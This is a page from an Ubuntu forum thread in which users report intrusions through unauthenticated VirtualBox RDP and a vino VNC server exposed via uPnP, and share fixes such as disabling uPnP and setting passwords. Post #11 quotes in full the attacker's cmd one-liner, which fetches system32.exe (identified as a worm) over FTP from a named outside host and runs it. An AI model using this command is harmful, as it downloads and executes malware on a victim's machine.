Page 2 of 2 FirstFirst 12
Results 11 to 15 of 15

Thread: Virus via Windows?

  1. #11
    Join Date
    Sep 2012
    Beans
    2

    Exclamation Re: Virus via Windows?

    I have an Ubuntu 12.04.1 fully updated Linux server (just updated yesterday) with the latest version of Virtualbox running Windows 7 (also fully updated). Windows 7 was running at the time.

    Today, when I used remote desktop protocol to get on to my Windows 7 VM, I saw notepad was opened, with the following text:


    cmd /c echo open countx6.servegame.com 21 >> ik &echo user nobody lampp >> ik &echo binary >> ik &echo get system32.exe >> ik &echo bye >> ik &ftp -n -v -s:ik &del ik &system32.exe &exit echo Windows has been updated.


    Needless to say, it scared the crap out of me. Who was on my system, and what were they trying to do? After inspecting everything, but not finding anything relevant in any logs, I realized that I had enabled the remote display in VirtualBox for my Windows 7 VM. VirtualBox does not use a password for the RDP service. I also noticed that the vino-server in Ubuntu had used uPnP to open port 5900 on my router. I figure this is how they got in.


    I'm still not sure how the notepad was opened and if anyone was actually on my system or if it was just a script kiddie, but I turned off uPnP, disabled the remote desktop, and scanned the system for malware. Nothing was found.


    Does anyone know how a remote attacker can open Notepad (or LibreOffice apparently) without being on the machine? I know a carefully crafted URL can accomplish the task, but how did our computers visit such a URL?


    I was curious, so I ftp'd to countx6.servegame.com and downloaded system32.exe. It's signature from MS Security Essentials was Worm:Win32/Nayrabot.gen!A.


    Scary stuff...

  2. #12
    Join Date
    Sep 2007
    Location
    Oklahoma, USA
    Beans
    2,268
    Distro
    Xubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Double-check any "system32.exe" file(s) you find on that Windows VM; what you found in Notepad was a script to create a batch file that would download a file by that name, which in all likelihood would be malware.

    However since it was still in Notepad, it's quite possible that you found it before the intruder had saved and executed it. If so, you should be in good shape. But if you find a system32.exe file with a very recent file-modified date, then the Windows VM would be highly suspect...
    --
    Jim Kyle in Oklahoma, USA
    Linux Counter #259718
    Howto mark thread: https://wiki.ubuntu.com/UnansweredPo.../SolvedThreads

  3. #13
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    958
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Aha!....you have had a similar experience to my own. What first alerted me that I had been hacked was something very similar as explained above...and how I was hacked was trough the vnc with uPnP ticked....now, I do not remember ticking this....last thing I remember was that I had ticked permission was needed to control the desktop....so how this changed I really do not know. It is possible I changed it...but I a 60% confident that I did not.

    I have run a number of root checks and not found anything malicous. I have now closed the ability to access my PC via the net.

    It strikes me that a) this was a bot..which is why my Libre Office writer file on my desktop was opened showing the virus script or b) some very clever (but ethical) hacker leaving his/her calling card to say "Wise up Buddy, you have been hacked!...check your system before the bad guys get in".

    I dunno, I am mystified by the whole thing. I am contemplating taking my PC back to bare metal and reinstalling....but that seems very paranoid as I cannot find any trace on the logs or on the rootkits that anything evil has happened.

    But thanks for sharing your experience...makes me feel much better in one way!
    Ubuntu is computer speak for defenestration

  4. #14
    Join Date
    Sep 2012
    Beans
    2

    Re: Virus via Windows?

    dunbrokin: From a bash prompt in an Ubuntu X environment, run the following program:
    Code:
    vino-preferences
    You might be surprised to find that the checkbox for "Automatically configure uPnP router to open and forward ports" is checked by default! Also, there is no password set up by default.

    I fixed my preferences right away! See attachment.
    Attached Images Attached Images

  5. #15
    Join Date
    Apr 2008
    Location
    Otago
    Beans
    958
    Distro
    Ubuntu 14.04 Trusty Tahr

    Re: Virus via Windows?

    Quote Originally Posted by catnmouse View Post
    dunbrokin: You might be surprised to find that the checkbox for "Automatically configure uPnP router to open and forward ports" is checked by default! Also, there is no password set up by default.
    I have already done that thanks....yes, I am more than surprised that this is the default!...what a security risk that is for all newbie Ubuntu users!
    Ubuntu is computer speak for defenestration

Page 2 of 2 FirstFirst 12

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •